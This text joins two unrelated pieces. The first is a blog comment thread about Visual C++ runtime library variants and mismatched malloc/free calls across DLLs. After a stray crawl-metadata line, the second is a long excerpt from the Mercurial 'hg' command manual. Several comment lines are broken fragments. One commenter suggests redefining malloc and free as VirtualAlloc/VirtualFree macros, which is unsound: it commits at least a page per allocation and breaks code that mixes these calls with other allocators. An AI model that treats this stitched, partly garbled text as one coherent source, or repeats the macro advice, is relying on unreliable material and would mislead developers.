To go off on a slight tangent: I’ve always thought the *six* versions of libc offered by VC++ is a bit gratuitous (libc, libcd, libcmt, libcmtd, mscrt, msvcrtd). This seems like bad design. Design is all about making decisions and accepting the relevant tradeoffs. I think ‘msvcrt’ (multithreaded DLL) should have been the only option. But instead, VC++ punts: they refuse to make a decision, and thereby force the issue on the user as “options”.
Four of the options — libc(mt)(d) — don’t even make sense. Is an application ever really “single-threaded” on Windows? You press Control-C, and Windows creates a thread. Does “static linking” have any meaning on Windows? On Unix, it means creating an executable which is *completely* self contained. But on Windows, you will still depend upon kernel32.dll at a minimum… in other words, by using a static version of libc, you have avoided your “DLL hell”/versioning problem only for that *one* library: libc.
I’ve seen this cause problems for users again and again. Forget about binary compability and versioning issues… because of the 6 versions of libc, it is possible to get conflicts when *building everything from source*. Poll: how many times have you downloaded & built a third party (static) library, and discovered at link time that it uses /ML(d)/MT(d)/MD(d) flags that are incompatible with the rest of your sub-projects? I’ve seen people who don’t know any better use /nodefaultlib and /force to jam an EXE togther in this scenario… in once case, someone managed to get a static copy of free() and a DLL-imported malloc() in the same EXE, resulting in a self-contained malloc/free conflict. Of course, you routinely get conflicts when going across DLL boundaries, with no linker kludgery whatsoever.
When programming on *nix, “Which flavor of libc should I use?” isn’t a decison I have to make, and I feel much better off.
The problem with free and malloc having multiple versions isn’t an issue with just Windows, it is an issue with any operating system where free and malloc isn’t an external allocator, is versioned or isn’t the standard allocator.
DOS, CP/M, VMS, Windows, etc all have issues with memory allocation. Even with VMS where the CRTL was a DLL, you have to be careful when allocating memory in a C module and then expecting a Fortran module to be able to free it. Oh, and VAX Fortran doesn’t really support memory allocation or pointers directly. You have to trick it into handling pointers.
Even the grand old Unix/Linux would have the same problem if you were using a NON C language that used memory allocation that either didn’t use malloc/free or augmented then in some way. (The same way that most Window’s mallocs/frees use gross allocations from the operating system and then subdivide them.)
So basically, to say that Unix/Linux doesn’t have this problem shows a simplistic understanding of the issue.
The important thing Raymond missed out in the post is the fact that cross module allocation/deallocation done wrongly would lead to memory leaks/subtle bugs or even crashes is due to the fact Tim mentioned earlier in one of his posts, that is there is a per module heap and the malloc/free happens on the module heap from within which the calls were made.
Leif, I’m VERY glad you weren’t the one making the decisions then.
You have basically the same options on *nix: linking against libc.a (static single-threaded), libc.so (dynamic single-threaded), libc_r.so (dynamic thread-safe).
The other 3 versions are the debug versions that add extra error checking and such for helping the developer find and debug errors in their programs.
As for Windows not having true static applications, do you really think that you can take a linux binary and run it on a PC without linux installed on it? The application has to be run on an OS. The kernel is part of that OS.
"Even the grand old Unix/Linux would have the same problem if you were using a NON C language that used memory allocation that either didn’t use malloc/free or augmented then in some way."
Yep. You also see the problem in C language libraries that for whatever reason need to implement their own malloc() . It’s much less common and much less useful now that most system malloc implementations are much better, but it was once common and frequently necessary. It can also happen if an executable uses different versions of libstdc++ (same issue as the CRT problem in win32) with the
new' anddelete’ operators.
In general, though, it’s much less problematic than on win32. This means that most *nix apps and especially apps with plugin interfaces tend to ignore the issue completely, resulting in incredible frustration when moving to win32.
The problems with memory (de)allocating and dll-hell is much more prominent on windows than other os, can’t deny that. It does however exist on other os but usually isn’t a concernable problem at all there. Can not expect sloppy BASIC programmers on Windows to be attentive to low level stuff. compete. cooperate for this to work. And it’s backwards-incompatible, too! (as intended).
>> But on Windows, you will still depend upon kernel32.dll at a minimum… in other words, by using a static version of libc, you have avoided your "DLL hell"/versioning problem only for that *one* library: libc.
Nonsense. You can easily code for the lowest common kernel32.dll you want to support and it’s easy to keep compatibility with Windows95 that way. And really there is no versioning to be worried about.
But if the system you’re running your program on doesn’t have msvcr71.dll you’re screwed.
If you want to build an application of a single exe file in C++ you have to use static linking.
OH! and you don’t have to use the multithreaded libc version as long as your threads do not use any libc function. It’s lighter and faster than the mt one (nowadays is probably insignificant but it can have its uses).
>.
Whoa… so you’re telling me that I can call FindMimeFromData from Java, using JNI (or whatever it’s called), and somebody will have magically created a deallocation function for me to use? Even though FindMimeFromData uses its own internal allocator, and there *IS* no deallocation function, even if you’re calling it from C? (See for some of the details of that one.)
> the only possible danger is that the user won’t call any at all (which is easily avoided via dispose/finalize).
I’m not talking about writing a full Java object to wrap an API. I’m talking about just the act of calling that API, from *any* code. If there is no deallocator, you can’t free the memory, GC or no. Or if you use the wrong deallocator in your wrapper, you’re not going to get the right result, GC or no. Java is not a magic bullet. (Neither is any other language, of course.)
> [Thus is the paradox of design. Give people no choice and they demand one. Give people a choice and they complain that you should have decided for them. -Raymond]
Now, I haven’t talked to a majority of Linux programmers. But I’ve never heard *anyone* complaining that there’s no choice in Linux C libraries. Everyone’s happy enough with glibc that they at least don’t try to distribute their own copy of it, to "preserve compatibility" or some such hogwash.
Of course, it helps that glibc has versioned symbols, so if you asked for an old version of a function when your code was compiled, you’ll get it when your code runs. So you have full backward compatibility by default. And it helps that the kernel never breaks backward compatibility at the syscall level, so even if you did distribute your own glibc for some crazy reason (or you skip glibc and make system calls directly, which is more common), it’d work.
And if the programmer that mismatched allocate and free is the same programmer that wrote JNI code instead, the situation is no better. They’ll still use the wrong deallocator for the allocator they used, because they’ll still go through the same thought processes when they decide which deallocator they need.
In other words, if your JNI code calls FindMimeFromData, then calls the C library free() on the resulting buffer, Java didn’t actually help. Or if you call whichever winpcap function allocates the list, then try to free() that list with a different C library, Java still didn’t help. You’re still using the wrong deallocator in both cases.
> you have to be careful when allocating memory in a C module and then expecting a Fortran module to be able to free it
Don’t even get me started on Fortran ;-) I don’t think the mixed-language argument detracts from my point, though: in VC++, if you build a bunch a DLLs — all written in the same language and built with the same version of the same compiler — with the default options, you get broken, non-intuitive behavior: crash at runtime when passing heap blocks, STL strings, C++ exceptions, etc. across DLL boundaries.
> You have basically the same options on *nix: linking against libc.a (static single-threaded), libc.so (dynamic single-threaded), libc_r.so (dynamic thread-safe).
This is true, I admit. (In fact, on Linux at least, there is no threaded/non-threaded choice: threads are handled in a sneaky way.)
But in any case, the effect of having a choice on Unix is not as disastrous as it is on Windows. Since Unix uses a global symbol namespace, only one malloc() implementation will prevail: if I choose to link my main executable against libc.a, everyone in my process space will be forced use libc.a’s malloc(), as there can be only one. On Unix, is not easy to get the kind of malloc/free conflict which Raymond describes. On Windows, it is easy to get it by accident.
Not that I think a single, shared global symbol namespace is a good idea, mind you. It can be a disaster (esp. with respect to libstc++ — just ask the Autopackage folks). Windows DLLs are much closer to the "right way" to do dynamic linking. But given the Windows DLL model, a single libc DLL should *at least* be the default, and in my opinion, the only option.
> The other 3 versions are the debug versions
If I were making the decisions, the debug version would be a runtime option. It is trivial to swap-in a different DLL with a matching interface at runtime (although the NT loader’s "KnownDLLs" mechanism complicates this for a subset of system DLLs). Or, you could do it like kernel32.dll does it: the debugging features are dynamically activated when running under a debugger.
> do you really think that you can take a linux binary and run it on a PC without linux installed on it?
Yeah, that’s what I think. You mean you can’t? :-)
> Nonsense. You can easily code for the lowest common kernel32.dll you want to support and it’s easy to keep compatibility with Windows95 that way. And really there is no versioning to be worried about.
I said you’d depend upon kernel32.dll *at a minimum*. Any non-trivial Windows app depends upon lots of DLLs, not just kernel32. On Unix, you have side-by-side static and non-static versions of most libraries. Static linking *makes sense* on Unix. As I said, on Unix, static linking enables you to create a self-contained executable — i.e., one that depends only on the kernel and has no dynamic dependencies. On Windows, what sense does static linking make? All of the Windows system libraries are DLL-only — and rightly so, because of the way the dynamic linker works (*). By statically linking libc — just *one* library — what problem is solved? Great — I don’t have to worry about "DLL hell" for msvcrt… but I still have to worry about it for comctl32 and everything else. :-/ You’ve only solved one instance of a much more general problem.
–Leif
(*) Imagine the disaster if Microsoft decided to give developers the "option" of linking against a static kernel32.lib. (Funny how no one ever complains about not having a static version of kernel32…) "Free memory allocated using LocalAlloc() by calling LocalFree()… oh, and by the way, if you statically linked against kernel32, you must call LocalFree() from the same EXE/DLL from which you allocated the memory." In order for static linking to make sense in general, your runtime linker must have a global namespace (like Unix). On Windows, the sane approach is to force users to use DLLs — *especially* if the library in question controls a "global" resource — in this case, the heap. I think the Win32 team realized this, but the VC++ team did not… or at least, they didn’t give it nearly enough weight.
Raymond wrote:
>> many people find it more convenient to use
>> the wrapper technique.
Ac’s fclose( f ) example illustrates a reason why: the function that deallocates memory can also do other stuff, in this case close the OS file handle. It’s a higher level, more object oriented approach.
Am I the only one here who thinks that DLLs have been used in the wrong way?
Everyone has been talking about reusable code for quite some time but what exactly is reusable? Applications are getting bigger and bigger with more and more DLLs.
Instead of using one system DLL we now have dozens of applications each using their own version of the same thing.
That leads to users having to depend on each application vendor to update their version of a DLL to get bugfixes, improved functionality or speed boost.
On a side note, has anyone notice how each and every application has their own copy of strlen(), strcpy(), malloc(), free()?
I mean why is it so hard to use VirtualAlloc()?!? It pisses me off every time I see malloc() because I know that the memory is not properly aligned for any SIMD operations.
What I would do in next C runtime header update would be this:
#define malloc(size) VirtualAlloc(NULL, (size), MEM_COMMIT, PAGE_READWRITE)
#define free(mem) VirtualFree(mem, 0, MEM_RELEASE)
That is what I am using all the time anyway.
> possibly even new and free.
i hope no one takes the original article seriously in this example :)
—
as for libcs on unix, there’s a ulibc floating around, and there *are* problems w/ glibc, specifically the transition from libc5 to libc6 (glibc) which actually resulted in lots of classic binary apps just not running anywhere.
in a certain way, the engineers would have been *better* off statically linking with libc5 because it would mean that the apps would run on modern linuxes (they don’t, and i believe there are some linuxes which don’t even bother providing a way for the user to easily install a libc5 — yes, you can rebuild libc5 yourself, but an average end user can not do that). — and yes, i’m talking about a closed source product which is no longer being rebuilt, but which is still better than certain other alternatives (certainly it’s a lot more stable).
Well, even C has inline functions. (Or at least, GCC does. I suppose I shouldn’t say that C does, because I don’t know for sure.) So that could still be a problem in C.
But if you’re providing a library, you should be explicitly exporting your functions anyway (using a .def file); see some of Raymond’s previous posts on the subject of name mangling, etc.
I would hope that the compiler/linker would be smart enough to *not* inline functions that are marked for export. Or, basically, to use gcc’s "extern inline" mode ("inline this if possible, but if not, call the extern, non-inlined version that I have defined somewhere else").
And we forgot that using malloc() and free() to allocate structures in C++ is a bad thing because if you later add say CString to a structure and allocate an array of structures malloc() won’t call CString constructor resulting in garbage/crash nor will free() call CString destructor resulting in a memory leak. rality, you’re view is correct. practice, you’re view is correct.
wr/t :
>> Everyone’s happy enough with glibc that they at least don’t try to distribute their own copy of it, to "preserve compatibility" or some such hogwash.<<
Not everyone’s happy with glibc. But most of those unhappy with glibc write their own replacement (like dietlibc), instead of distributing their own copy.
And you’ve got one big advantage (as distributor, as well as developer): You’ve got the source of virtually everything, so you can compile it against the same versions of libs with the same toolchain (minus fixing some bugs).
Whenever some binary only software comes in, Hell breaks loose.
It is good to see Microsoft release a fix when they make the same mistake.
> A previous update implements a new memory
> heap in NDIS and then calls a new allocator
> function. However, this previous update does
> not use the matching de-allocator.
> Therefore, a free is requested for the wrong
> memory pool.
I think end users can download a package that includes this hotfix, but end users can’t install it. Someone has to persuade vendors to provide flashable firmware. | https://blogs.msdn.microsoft.com/oldnewthing/20060915-04/?p=29723 | CC-MAIN-2016-50 | refinedweb | 4,811 | 70.73 |
hg −.
−R,−−repository <REPO>
repository root directory or name of overlay bundle file
−−cwd <DIR>
change working directory
−y, −−noninteractive
do not prompt, automatically pick the first choice for all prompts
−q, −−quiet
suppress output
−v, −−verbose
enable additional output
−−config <CONFIG[+]>
set/override config option (use 'section.name=value')
−−debug
enable debugging output
−−debugger
start debugger
−−encoding <ENCODE>
set the charset encoding (default: UTF−8)
−−encodingmode <MODE>
set the charset encoding mode (default: strict)
−−traceback
always print a traceback on exception
−−time
time how long the command takes
−−profile
print command execution profile
−−version
output version information and exit
−h, −−help
display help and exit
−−hidden
consider hidden changesets
[+] marked option can be specified multiple times:
−I,−−include <PATTERN[+]>
include names matching the given patterns
−X,−−exclude <PATTERN[+]>
exclude names matching the given patterns
−S, −−subrepos
recurse into subrepositories
−n, −−dry−run
do not perform actions, just print output
addremove
add all new files, delete all missing files:
hg addremove [OPTION]... [FILE]...
Add all new files and remove all missing files from the repository.
New files are ignored if they match any of the patterns in .hgignore. As with add, these changes take effect at the next commit.
Use the −s/−−similarity −C can be used to check which files were identified as moved or renamed. If not specified, −s/−−similarity defaults to 100 and only renames of identical files are detected.
Options:
−s,−−similarity <SIMILARITY>
guess renamed files by similarity (0<=s<=100)
−I,−−include <PATTERN[+]>
annotate
show changeset information by line for each file:
hg annotate [−r REV] [−f] [−a] [−u] [−d] [−n] [−c] [−l] FILE...
List changes in files, showing the revision id responsible for each line
This command is useful for discovering when a change was made and by whom.
Without the −a/−−text option, annotate will avoid processing files it detects as binary. With −a, annotate will annotate the file anyway, although the results will probably be neither useful nor desirable.
Returns 0 on success.
Options:
−r,−−rev <REV>
annotate the specified revision
follow copies/renames and list the filename (DEPRECATED)
−−no−follow
don't follow copies and renames
−a, −−text
treat all files as text
−u, −−user
list the author (long with −v)
−f, −−file
list the filename
−d, −−date
list the date (short with −q)
−n, −−number
list the revision number (default)
−c, −−changeset
list the changeset
−l, −−line−number
show line number at the first appearance
−w, −−ignore−all−space
ignore white space when comparing lines
−b, −−ignore−space−change
ignore changes in the amount of white space
−B, −−ignore−blank−lines
ignore changes whose lines are all blank
−T,−−template <TEMPLATE>
display with template (EXPERIMENTAL)
aliases: blame
archive
create an unversioned archive of a repository revision:
hg archive [OPTION]... DEST
By default, the revision used is the parent of the working directory; use −r/−−rev to specify a different revision.
The archive type is automatically detected based on file extension (or override using −t/−−type).
Examples:
•
create a zip file containing the 1.0 release:
hg archive −r 1.0 project−1.0.zip
create a tarball excluding .hg files:
hg archive project.tar.gz −X " −p/−−prefix to specify a format string for the prefix. The default is the basename of the archive, with suffixes removed.
Options:
−−no−decode
do not pass files through decoders
−p,−−prefix <PREFIX>
directory prefix for files in archive
−r,−−rev <REV>
revision to distribute
−t,−−type <TYPE>
type of distribution to create
backout
reverse effect of earlier changeset:
hg backout [OPTION]... [−r] −−merge, the pending changeset will instead have two parents: the old parent of the working directory and a new child of REV that simply undoes REV.
Before version 1.7, the behavior without −−merge was equivalent to specifying −−merge followed by hg update −−clean . to cancel the merge and leave the child of REV as a head to be merged separately.
See hg help dates for a list of formats valid for −d/−−date.
Returns 0 on success, 1 if nothing to backout or there are unresolved files.
Options:
−−merge
merge with old dirstate parent after backout
−−commit
commit if no conflicts were encountered
−−parent <REV>
parent to choose when backing out merge (DEPRECATED)
revision to backout
−e, −−edit
invoke editor on commit messages
−t,−−tool <VALUE>
specify merge tool
−m,−−message <TEXT>
use text as commit message
−l,−−logfile <FILE>
read commit message from file
−d,−−date <DATE>
record the specified date as commit date
−u,−−user <USER>
record the specified user as committer
bisect
subdivision search of changesets:
hg bisect [−gbsr] [−U] [−c −U/−−n−zero exit status means the revision is bad.
Some examples:
start a bisection with known bad revision 34, and good revision 12:
hg bisect −−bad 34
hg bisect −−good 12
advance the current bisection by marking current revision as good or bad:
hg bisect −−good
hg bisect −−bad
mark the current revision, or a known revision, to be skipped (e.g. if that revision is not usable because of another issue):
hg bisect −−skip
hg bisect −−skip 23
skip all revisions that do not touch directories foo or bar:
hg bisect −−skip "!( file('path:foo') & file('path:bar') )"
forget the current bisection:
hg bisect −−reset
use 'make && make tests' to automatically find the first broken revision:
hg bisect −−reset
hg bisect −−bad 34
hg bisect −−good 12
hg bisect −−command "make && make tests"
see all changesets whose states are already known in the current bisection:
hg log −r "bisect(pruned)"
see the changeset currently being bisected (especially useful if running with −U/−−noupdate):
hg log −r "bisect(current)"
see all changesets that took part in the current bisection:
hg log −r "bisect(range)"
you can even get a nice graph:
hg log −−graph −r "bisect(range)"
See hg help revsets for more about the bisect() keyword.
Options:
−r, −−reset
reset bisect state
−g, −−good
mark changeset good
−b, −−bad
mark changeset bad
−s, −−skip
skip testing changeset
−e, −−extend
extend the bisect range
−c,−−command <CMD>
use command to check changeset state
−U, −−noupdate
do not update to target.
create an active bookmark for a new line of development:
hg book new−feature
create an inactive bookmark as a place marker:
hg book −i reviewed
create an inactive bookmark on another changeset:
hg book −r .^ tested
move the '@' bookmark from another branch:
hg book −f @
Options:
−f, −−force
force
−d, −−delete
delete a given bookmark
−m,−−rename <NAME>
rename a given bookmark
−i, −−inactive
mark a bookmark inactive
aliases: bookmark
branch
set or show the current branch name:
hg branch [−fC] [NAME]
Branch names are permanent and global. Use hg bookmark to create a light−weight −f/−−force is specified, branch will not let you set a branch name that already exists.
Use −C/−−clean to reset the working directory branch to that of the parent of the working directory, negating a previous branch change.
Use the command hg update to switch to an existing branch. Use hg commit −−close−branch to mark this branch head as closed. When all heads of the branch are closed, the branch will be considered closed.
set branch name even if it shadows an existing branch
−C, −−clean
reset branch name to parent branch name
branches
list repository named branches:
hg branches [−ac]
List the repository's named branches, indicating which ones are inactive. If −c/−−closed is specified, also list branches which have been marked closed (see hg commit −−close−branch).
Use the command hg update to switch to an existing branch.
Returns 0.
Options:
−a, −−active
show only branches that have unmerged heads (DEPRECATED)
−c, −−closed
show normal and closed branches
bundle
create a changegroup file:
hg bundle [−f] [−t TYPE] [−a] [−r REV]... [−−base REV]... FILE [DEST]
Generate a compressed changegroup file collecting changesets not known to be in another repository.
If you omit the destination repository, then hg assumes the destination will have all the nodes you specify with −−base parameters. To create a bundle containing all changesets, use −a/−−all (or −−base null).
You can change compression method with the −t/−−type.
run even when the destination is unrelated
−r,−−rev <REV[+]>
a changeset intended to be added to the destination
−b,−−branch <BRANCH[+]>
a specific branch you would like to bundle
−−base <REV[+]>
a base changeset assumed to be available at the destination
−a, −−all
bundle all changesets in the repository
bundle compression type to use (default: bzip2)
−e,−−ssh <CMD>
specify ssh command to use
−−remotecmd <CMD>
specify hg command to run on the remote side
−−insecure
do not verify server certificate (ignoring web.cacerts config) format string. The formatting rules as follows:
%%
literal "%" character
%s
basename of file being printed
%d
dirname of file being printed, or '.' if in repository root
%p
root−relative path name of file being printed
%H
changeset hash (40 hexadecimal digits)
%R
changeset revision number
%h
short−form changeset hash (12 hexadecimal digits)
%r
zero−padded changeset revision number
%b
basename of the exporting repository
Options:
−o,−−output <FORMAT>
print output to file with formatted name
print the given revision
−−decode
apply any matching decode filter −r/−−rev or branches with −b/−−branch. The resulting clone will contain only the specified changesets and their ancestors. These options (or 'clone src#rev dest') imply −−pull, −u/−−update, or −U/−−n −−pull option to avoid hardlinking.
In some cases, you can clone repositories and the working directory using full hardlinks with
$ cp − −U or the source repository has no changesets
b.
if −u . and the source repository is local, the first parent of the source repository's working directory
c.
the changeset specified with −u (if a branch name, this means the latest head of that branch)
d.
the changeset specified with −r
e.
the tipmost head specified with −b
f.
the tipmost head specified with the url#branch source syntax
g.
the revision marked with the '@' bookmark, if present
h.
the tipmost head of the default branch
i.
tip
clone a remote repository to a new directory named hg/:
hg clone
create a lightweight local clone:
hg clone project/ project−feature/
clone from an absolute path on an ssh server (note double−slash):
hg clone ssh://user@server//home/projects/alpha/
do a high−speed clone over a LAN while checking out a specified version:
hg clone −−uncompressed −u 1.5
create a repository without changesets after a particular revision:
hg clone −r 04e544 experimental/ good/
clone (and track) a particular named branch:
hg clone
See hg help urls for details on specifying URLs.
Options:
−U, −−noupdate
the clone will include an empty working directory (only a repository)
−u,−−updaterev <REV>
revision, tag or branch to check out
include the specified changeset
clone only the specified branch
−−pull
use pull protocol to copy metadata
−−uncompressed
use uncompressed transfer (fast over LAN) −I/−X filters.
If no commit message is specified, Mercurial starts your configured editor where you can enter a message. In case your commit fails, you will find a backup of your message in .hg/last−message.txt.
The −−close−branch flag can be used to mark the current branch head closed. When all heads of a branch are closed, the branch will be considered closed and no longer listed.
The −−amend−backup .
Returns 0 on success, 1 if nothing changed.
Options:
−A, −−addremove
mark new/missing files as added/removed before committing
−−close−branch
mark a branch head as closed
−−amend
amend the parent of the working directory
−s, −−secret
use the secret phase for committing
−i, −−interactive
use interactive mode
aliases: ci
config
show combined config settings from all hgrc files:
hg config [−u] [NAME]...
With no arguments, print names and values of all config items.
With one argument of the form section.name, print just the value of that config item.
With multiple arguments, print names and values of all config items with matching section names.
With −−edit, start an editor on the user−level config file. With −−global, edit the system−wide config file. With −−local, edit the repository−level config file.
With −−debug, the source (filename and line number) is printed for each config item.
See hg help config for more information about config files.
Returns 0 on success, 1 if NAME does not exist.
Options:
−u, −−untrusted
show untrusted configuration options
edit user config
−l, −−local
edit repository config
−g, −−global
edit global config
aliases: showconfig debugconfig
copy
mark files as copied for the next commit: −A/−−after, the operation is recorded, but no copying is performed.
This command takes effect with the next commit. To undo a copy before that, see hg revert.
Returns 0 on success, 1 if errors are encountered.
Options:
−A, −−after
record a copy that has already occurred
−f, −−force
forcibly copy over an existing managed file
aliases: cp
diff
diff repository (or selected files):
hg diff [OPTION]... ([−c REV] | [−r REV1 [−r REV2]]) [FILE]...
Show differences between revisions for the specified files.
Differences between files are shown using the unified diff format. −c/−−change with a revision to see the changes in that changeset relative to its first parent.
Without the −a/−−text option, diff will avoid generating diffs of files it detects as binary. With −a, diff will generate a diff anyway, probably with undesirable results.
Use the −g/−−git option to generate diffs in the git extended diff format. For more information, read hg help diffs.
compare a file in the current working directory to its parent:
hg diff foo.c
compare two historical versions of a directory, with rename info:
hg diff −−git −r 1.0:1.2 lib/
get change stats relative to the last change on some date:
hg diff −−stat −r "date('may 2')"
diff all newly−added files that contain a keyword:
hg diff "set:added() and grep(GNU)"
compare a revision and its parents:
hg diff −c 9353 # compare against first parent
hg diff −r 9353^:9353 # same using revset syntax
hg diff −r 9353^2:9353 # compare against the second parent
Options:
−r,−−rev <REV[+]>
−c,−−change <REV>
change made by revision
−g, −−git
use git extended diff format
−−nodates
omit dates from diff headers
−−noprefix
omit a/ and b/ prefixes from filenames
−p, −−show−function
show which function each change is in
−−reverse
produce a diff that undoes the changes
−U,−−unified <NUM>
number of lines of context to show
−−stat
output diffstat−style summary of changes
−−root <DIR>
produce diffs relative to subdirectory
export
dump the header and diffs for one or more changesets:
hg export [OPTION]... [−o OUTFILESPEC] [−r] [REV]...
Print the changeset header and diffs for one or more revisions. If no revision is given, the parent of the working directory is used.
The information shown in the changeset header is: author, date, branch name (if non−default), changeset hash, parent(s) and commit comment.
export may generate unexpected diff output for merge changesets, as it will compare the merge changeset against its first parent only.
Output may be to a file, in which case the name of the file is given using a format string. The formatting rules are as follows:
%N
number of patches being generated
%m
first line of the commit message (only alphanumeric characters)
%n
zero−padded sequence number, starting at 1
Without the −a/−−text option, export will avoid generating diffs of files it detects as binary. With −a, export will generate a diff anyway, probably with undesirable results.
Use the −g/−−git option to generate diffs in the git extended diff format. See hg help diffs for more information.
With the −−switch−parent option, the diff will be against the second parent. It can be useful to review a merge.
use export and import to transplant a bugfix to the current branch:
hg export −r 9353 | hg import −
export all the changesets between two revisions to a file with rename information:
hg export −−git −r 123:150 > changes.txt
split outgoing changes into a series of patches with descriptive names:
hg export −r "outgoing()" −o "%n−%m.patch"
−−switch−parent
diff against the second parent
revisions to export
files
list tracked files:
hg files [OPTION]... [PATTERN]...
Print files under Mercurial control in the working directory or specified revision whose names match the given patterns (excluding removed files).
If no patterns are given to match, this command prints the names of all files under Mercurial control in the working directory.
list all files under the current directory:
hg files .
shows sizes and flags for current revision:
hg files −vr .
list all files named README:
hg files −I "**/README"
list all binary files:
hg files "set:binary()"
find files containing a regular expression:
hg files "set:grep('bob')"
search tracked file contents with xargs and grep:
hg files −0 | xargs −0 grep foo
See hg help patterns and hg help filesets for more information on specifying file patterns.
Returns 0 if a match is found, 1 otherwise.
search the repository as it is in REV
−0, −−print0
end filenames with NUL, for use with xargs.
forget newly−added binary files:
hg forget "set:added() and binary()"
forget files that would be excluded by .hgignore:
hg forget "set:hgignore()"
graft
copy changes from other branches onto the current branch:
hg graft [OPTION]... [−r] REV...
This command uses Mercurial's merge logic to copy individual changes from other branches without merging branches in the history graph. This is sometimes known as 'backporting' or 'cherry−picking'. By default, graft will copy user, date, and description from the source changesets.
Changesets that are ancestors of the current revision, that have already been grafted, or that are merges will be skipped.
If −−log is specified, log messages will have a comment appended of the form:
(grafted from CHANGESETHASH)
If −−force −c/−−continue option.
The −c/−−continue option does not reapply earlier options, except for −−force.
copy a single change to the stable branch and edit its description:
hg update stable
hg graft −−edit 9393
graft a range of changesets with one exception, updating dates:
hg graft −D "2085::2093 and not 2091"
continue a graft after resolving conflicts:
hg graft −c
show the source of a grafted changeset:
hg log −−debug −r .
See hg help revisions and hg help revsets for more about specifying revisions.
Returns 0 on successful completion.
revisions to graft
−c, −−continue
resume interrupted graft
−−log
append graft info to log message
force graft
−D, −−currentdate
record the current date as commit date
−U, −−currentuser
record the current user as committer ("−" for a match that becomes a non−match, or "+" for a non−match that becomes a match), use the −−all flag.
Options:
−0, −−print0
end fields with NUL
−−all
print all revisions that match
−f, −−follow
follow changeset history, or file history across copies and renames
−i, −−ignore−case
ignore case when matching
−l, −−files−with−matches
print only filenames and revisions that match
−n, −−line−number
print matching line numbers
only search files changed within revision range
heads
show branch heads:
hg heads [−ct] [−r−out branch.
If −c/−−closed is specified, also show branch heads marked closed (see hg commit −−close−branch).
If STARTREV is specified, only those heads that are descendants of STARTREV will be displayed.
If −t/−−topo is specified, named branch mechanics will be ignored and only topological heads (changesets with no children) will be shown.
Returns 0 if matching heads are found, 1 if not.
Options:
−r,−−rev <STARTREV>
show only heads which are descendants of STARTREV
−t, −−topo
show topological heads only
−a, −−active
show active branchheads only (DEPRECATED)
show normal and closed branch heads
−−style <STYLE>
display using template map file (DEPRECATED)
display with template
show help for a given topic or a help overview:
hg help [−ec] [TOPIC]
With no arguments, print a list of commands with short help messages.
Given a topic, extension, or command name, print help for that topic.
Returns 0 if successful.
Options:
−e, −−extension
show only help for extensions
−c, −−command
show only help for commands
−k,−−keyword <VALUE>
show topics matching keyword
identify
identify the working directory or specified revision:
hg identify [−nibtB] [−r.
generate a build identifier for the working directory:
hg id −−id > build−id.dat
find the revision corresponding to a tag:
hg id −n −r 1.3
check the most recent revision of a remote repository:
hg id −r tip
identify the specified revision
−n, −−num
show local revision number
−i, −−id
show global revision id
−b, −−branch
show branch
−t, −−tags
show tags
−B, −−bookmarks
show bookmarks
aliases: id
import
import an ordered set of patches:
hg import [OPTION]... PATCH...
Import a list of patches and commit them individually (unless −−no−commit is specified).
Because import first applies changes to the working directory, import will abort if there are outstanding changes.
You can import a patch straight from a mail message. Even patches as attachments work (to use the body part, it must have type text/plain or text/x−patch). −m/−−message and −u/−−user override these.
If −−exact −−bypass to apply and commit patches directly to the repository, not touching the working directory. Without −−exact, patches will be applied on top of the working directory parent revision.
With −s/−−similarity, hg will attempt to discover renames and copies in the patch in the same way as hg addremove.
Use −−partial to ensure a changeset will be created from the patch even if some hunks fail to apply. Hunks that fail to apply will be written to a <target−file>.rej file. Conflicts can then be resolved by hand before hg commit −−amend is run to update the created changeset. This flag exists to let people import patches that partially apply without losing the associated metadata (author, date, description, ...). Note that when none of the hunk applies cleanly, hg import −−partial will create an empty changeset, importing only the patch metadata..
To read a patch from standard input, use "−" as the patch name. If a URL is specified, the patch will be downloaded from it. See hg help dates for a list of formats valid for −d/−−date.
import a traditional patch from a website and detect renames:
hg import −s 80
import a changeset from an hgweb server:
hg import
import all the patches in an Unix−style mbox:
hg import incoming−patches.mbox
attempt to exactly restore an exported changeset (not always possible):
hg import −−exact proposed−fix.patch
use an external tool to apply a patch which is too fuzzy for the default internal tool.
hg import −−config ui.patch="patch −−merge" fuzzy.patch
change the default fuzzing from 2 to a less strict 7
hg import −−config ui.fuzz=7 fuzz.patch
Returns 0 on success, 1 on partial success (see −−partial).
Options:
−p,−−strip <NUM>
directory strip option for patch. This has the same meaning as the corresponding patch option (default: 1)
−b,−−base <PATH>
base path (DEPRECATED)
skip check for outstanding uncommitted changes (DEPRECATED)
−−no−commit
don't commit, just update the working directory
−−bypass
apply patch without touching the working directory
−−partial
commit even if some hunks fail
−−exact
apply patch to the nodes from which it was generated
−−prefix <DIR>
apply patch to subdirectory
−−import−branch
use any branch information in patch (implied by −−exact)
−s,−−similarity <SIMILARITY>
aliases: patch
incoming
show new changesets found in source:
hg incoming [−p] [−n] [−M] [−f] [−r REV]... [−−bundle FILENAME] [SOURCE]
Show new changesets found in the specified path/URL or the default pull location. These are the changesets that would have been pulled if a pull at the time you issued this command.
See pull for valid source format details.
With −B/−−bookmarks, the result of bookmark comparison between local and remote repositories is displayed. With −v/−−verb −−bundle avoids downloading the changesets twice if the incoming is followed by a pull.
show incoming changes with patches and full description:
hg incoming −vp
show incoming changes excluding merges, store a bundle:
hg in −vpM −−bundle incoming.hg
hg pull incoming.hg
briefly list changes inside a bundle:
hg in changes.hg −T "{desc|firstline}\n"
Returns 0 if there are incoming changes, 1 otherwise.
run even if remote repository is unrelated
−n, −−newest−first
show newest record first
−−bundle <FILE>
file to store the bundles into
a remote changeset intended to be added
compare bookmarks
a specific branch you would like to pull
−p, −−patch
show patch
−l,−−limit <NUM>
limit number of changes displayed
−M, −−no−merges
do not show merges
−G, −−graph
show the revision DAG
aliases: in
init
create a new repository in the given directory:
hg init [−e CMD] [−−rem.
Options:
−e,−−ssh <CMD> "−−include .".
If you want to feed the output of this command into the "xargs" command, use the −0 option to both this command and "xargs". This will avoid the problem of "xargs" treating single filenames that contain whitespace as multiple filenames.
See hg help files for a more versatile command.
−f, −−fullpath
print complete paths from the filesystem root
log
show revision history of entire repository or files:
hg log [OPTION]... [FILE]
Print the revision history of the specified files or the entire project.
If no revision range is specified, the default is tip:0 unless −−follow is set, in which case the working directory parent is used as the starting revision.
File history is shown without following rename or copy history of files. Use −f/−−follow with a filename to follow history across renames and copies. −−follow without a filename will only show ancestors or descendants of the starting revision.
By default this command prints revision number and changeset id, tags, non−trivial parents, user, date and time, and a summary for each commit. When the −v/−−verbose switch is used, the list of changed files and full commit message are shown.
